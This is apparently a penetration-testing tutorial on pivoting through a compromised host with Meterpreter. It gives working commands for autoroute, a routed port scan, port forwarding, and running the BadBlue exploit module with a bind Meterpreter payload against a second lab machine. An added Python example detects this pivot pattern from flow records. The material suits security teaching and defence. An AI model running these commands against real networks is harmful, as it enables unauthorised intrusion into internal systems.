Pivoting Overview

Pivoting

  • Pivoting is a post-exploitation technique that uses a compromised host connected to multiple networks to reach systems on those other networks.

  • After gaining access to one host, we can use that compromised host to reach and exploit other hosts on a private internal network that we could not access before.

  • Meterpreter provides us with the ability to add a network route to the internal network’s subnet, perform port forwarding and consequently scan and exploit other systems on the network.

Port Forwarding

  • Port forwarding is the process of redirecting traffic from a specific port on a target system to a specific port on our system.

  • In the context of pivoting, we can forward a remote port on a previously inaccessible host to a local port on our Kali Linux system so that we can interact with, and exploit, the service running on that port from our own machine.

To understand pivoting, let's consider a scenario where there are two target systems: Victim 1 (10.0.29.148) and Victim 2 (10.0.29.96). From our attacking machine, we can only communicate with Victim 1, and Victim 1 can communicate with Victim 2. In this case, we need to compromise Victim 1 and then use port forwarding to attack Victim 2.


Pivoting from Victim 1 to Victim 2 Using Meterpreter

  1. Set Up Communication Channel:

    On the meterpreter shell obtained on Victim 1 (10.0.29.148), set up a communication channel to the subnet that includes Victim 2 (10.0.29.96):

    run autoroute -s 10.0.29.0/20

    View the latest routing table to confirm:

    run autoroute -p

  2. Use Metasploit's Port Scanner:

    Since Nmap cannot directly reach Victim 2, use Metasploit's port scanner, which is routed through the Meterpreter session. Load the TCP port scanner module and set RHOSTS to Victim 2:

    use auxiliary/scanner/portscan/tcp
    set RHOSTS 10.0.29.96
    run

  3. Port Forwarding for Nmap Scan:

    To scan services on Victim 2 using Nmap, set up port forwarding. Forward the service running on Victim 2's port 80 to your attacking machine's port 1234:

    portfwd add -l 1234 -p 80 -r 10.0.29.96

    Now, run an Nmap scan on your local machine:

    nmap -sV -p 1234 localhost

    This will show the services running on Victim 2 (10.0.29.96) on port 80.

  4. Exploit the Vulnerability:

    Having detected a vulnerability in BadBlue on Victim 2 (10.0.29.96) on port 80, use the appropriate Metasploit module to exploit it. A bind payload is used because Victim 2 cannot initiate a connection back to the attacking machine; Metasploit instead connects to the listening payload through the route added in step 1:

    use exploit/windows/http/badblue_passthru
    set payload windows/meterpreter/bind_tcp
    set RHOSTS 10.0.29.96
    run

This will grant you access to Victim 2 (10.0.29.96) through a meterpreter shell.
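The sequence above leaves a recognisable footprint on the network: the compromised host (Victim 1) holds a session with an outside address, and because the scan, the port forward and the exploit are all routed through it, it then starts contacting many ports on an internal neighbour. The following added example is not part of the original page; it shows how a defender could flag that pattern from flow records. The record format, the addresses, the attacker port and the port threshold are all assumptions constructed for the example.

```python
import ipaddress
from collections import defaultdict

# Constructed flow records: (src_ip, dst_ip, dst_port). Sample values written
# for this example, not captures from the lab described on the page.
FLOWS = [
    ("203.0.113.5", "10.0.29.148", 4444),  # outside address holding a session on Victim 1
    ("10.0.29.148", "10.0.29.96", 22),     # Victim 1 fanning out to Victim 2 ...
    ("10.0.29.148", "10.0.29.96", 80),     # ... including the forwarded port 80
    ("10.0.29.148", "10.0.29.96", 135),
    ("10.0.29.148", "10.0.29.96", 139),
    ("10.0.29.148", "10.0.29.96", 445),
    ("10.0.29.148", "10.0.29.96", 3389),
    ("10.0.29.148", "10.0.29.96", 8080),
    ("10.0.29.10", "10.0.29.96", 445),     # ordinary internal file-share traffic
    ("10.0.29.10", "10.0.29.96", 80),
]

# The range a route for 10.0.29.0/20 actually covers (10.0.16.0 to 10.0.31.255).
INTERNAL = ipaddress.ip_network("10.0.16.0/20")


def find_pivot_candidates(flows, internal=INTERNAL, port_threshold=5):
    """Return {host: details} for internal hosts that both accept a connection
    from outside the internal range and contact at least port_threshold distinct
    ports on a single internal neighbour (a scan relayed through a pivot)."""
    inbound_external = defaultdict(set)                      # host -> external peers
    internal_ports = defaultdict(lambda: defaultdict(set))   # host -> dst -> ports
    for src, dst, port in flows:
        src_in = ipaddress.ip_address(src) in internal
        dst_in = ipaddress.ip_address(dst) in internal
        if dst_in and not src_in:
            inbound_external[dst].add(src)
        elif src_in and dst_in:
            internal_ports[src][dst].add(port)

    findings = {}
    for host, peers in inbound_external.items():
        targets = {dst: sorted(ports)
                   for dst, ports in internal_ports.get(host, {}).items()
                   if len(ports) >= port_threshold}
        if targets:
            findings[host] = {"external_peers": sorted(peers), "targets": targets}
    return findings


if __name__ == "__main__":
    for host, info in find_pivot_candidates(FLOWS).items():
        print(f"possible pivot {host}: session from {info['external_peers']}, "
              f"fan-out to {info['targets']}")
```

A host with many internal peers but no external session, or an external session with no internal fan-out, is not flagged; tune the threshold to the normal port diversity seen in your own flow data.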

Meterpreter Commands:

  • run autoroute -s 10.0.29.0/20 – Add a route through the Meterpreter session for the subnet 10.0.29.0/20 (a /20 mask covers 10.0.16.0 to 10.0.31.255, which includes both victims), so that Metasploit modules can reach hosts in that range.

  • run autoroute -p – Show the current routing table.

  • portfwd add -l 1234 -p 80 -r 10.0.29.96 – Forward traffic from local port 1234 to remote IP 10.0.29.96 on port 80.

Metasploit Modules:

  • auxiliary/scanner/portscan/tcp – A Metasploit auxiliary module for performing TCP port scans.

  • exploit/windows/http/badblue_passthru – A Metasploit module for exploiting vulnerabilities in the BadBlue web server to achieve remote code execution.
